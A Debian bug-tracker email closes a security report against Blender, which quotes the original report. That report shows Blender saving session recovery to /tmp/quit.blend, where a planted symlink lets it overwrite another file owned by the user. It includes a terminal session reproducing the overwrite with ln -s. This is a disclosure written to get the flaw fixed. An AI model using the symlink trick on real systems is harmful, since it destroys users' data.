Your message dated Thu, 05 Jan 2012 12:48:51 +0100
with message-id <[email protected]>
and subject line Re: blender: possible symlink attack
has caused the Debian Bug report #584621,
regarding blender: possible symlink attack
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)
--
584621: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=584621
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message ---
Package: blender
Version: 2.50~alpha~0~svn24834-2
Severity: normal
Tags: security
Forwarded:
https://projects.blender.org/tracker/index.php?func=detail&aid=22509&group_id=9&atid=498
Blender is subject to symlink attack when the user closes the app
without saving their changes. The consequences are that an attacker
determined file owned by the victim is overwritten with a .blend file,
destroying whatever data was in the file in the process.
Version 2.49.2~dfsg-2 isn't vulnerable to this attack since it uses
~/.blender/quit.blend instead of /tmp/quit.blend. I would suggest this
behaviour be restored before Blender 2.50 is released.
pabs@chianamo:~$ sudo ln -s /home/pabs/foo /tmp/quit.blend
[sudo] password for pabs:
pabs@chianamo:~$ ls -l /tmp/quit.blend /home/pabs/foo
ls: cannot access /home/pabs/foo: No such file or directory
lrwxrwxrwx 1 root root 14 Jun 5 13:51 /tmp/quit.blend -> /home/pabs/foo
pabs@chianamo:~$ file /tmp/quit.blend /home/pabs/foo
/tmp/quit.blend: symbolic link to `/home/pabs/foo'
/home/pabs/fooo: ERROR: cannot open `/home/pabs/foo' (No such file or directory)
pabs@chianamo:~$ blender
Ob 'Camera' - Successfully removed 0 keyframes
*bpy stats* - tot exec: 5728, tot run: 0.4375sec, average run: 0.000076sec,
tot usage 1.4299%
Saved session recovery to /tmp/quit.blend
Blender quit
pabs@chianamo:~$ ls -l /tmp/quit.blend /home/pabs/foo
-rw-r----- 1 pabs pabs 78K Jun 5 13:53 /home/pabs/foo
lrwxrwxrwx 1 root root 14 Jun 5 13:51 /tmp/quit.blend -> /home/pabs/foo
pabs@chianamo:~$ file /tmp/quit.blend /home/pabs/foo
/tmp/quit.blend: symbolic link to `/home/pabs/foo'
/home/pabs/foo: Blender3D, saved as 64-bits little endian with version
2.50.0007
pabs@chianamo:~$ echo foo > /home/pabs/foo
pabs@chianamo:~$ ls -l /tmp/quit.blend /home/pabs/foo
-rw-r----- 1 pabs pabs 4 Jun 5 14:00 /home/pabs/foo
lrwxrwxrwx 1 root root 14 Jun 5 13:51 /tmp/quit.blend -> /home/pabs/foo
pabs@chianamo:~$ file /tmp/quit.blend /home/pabs/foo
/tmp/quit.blend: symbolic link to `/home/pabs/foo'
/home/pabs/foo: ASCII text
pabs@chianamo:~$ blender
*bpy stats* - tot exec: 648, tot run: 0.0677sec, average run: 0.000104sec,
tot usage 0.4556%
Saved session recovery to /tmp/quit.blend
Blender quit
pabs@chianamo:~$ file /tmp/quit.blend /home/pabs/foo
/tmp/quit.blend: symbolic link to `/home/pabs/foo'
/home/pabs/foo: Blender3D, saved as 64-bits little endian with version
2.50.0007
--
bye,
pabs
http://wiki.debian.org/PaulWise
signature.asc
Description: This is a digitally signed message part
--- End Message ---
--- Begin Message ---
Package: blender
Version: 2.61-1
Closing.
Feel free to re-open the report if the issue persists.
Thanks for your time and efforts.
--
Matteo F. Vescovi
Debian Sponsored Maintainer
e-mail: [email protected]
GnuPG KeyID: 1E9C4467
--- End Message ---
